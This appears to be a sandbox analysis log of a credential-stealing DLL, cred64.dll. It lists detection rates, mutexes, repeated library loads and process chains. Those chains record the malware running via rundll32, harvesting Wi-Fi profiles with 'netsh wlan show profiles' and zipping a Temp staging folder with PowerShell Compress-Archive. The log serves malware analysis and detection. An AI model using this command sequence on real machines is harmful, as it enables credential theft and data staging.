    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
    Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\_Files_\Jump to behavior
    Source: cred64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142EEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: cred64.dll.dllReversingLabs: Detection: 36%
    Source: cred64.dll.dllVirustotal: Detection: 38%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,SaveJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",SaveJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
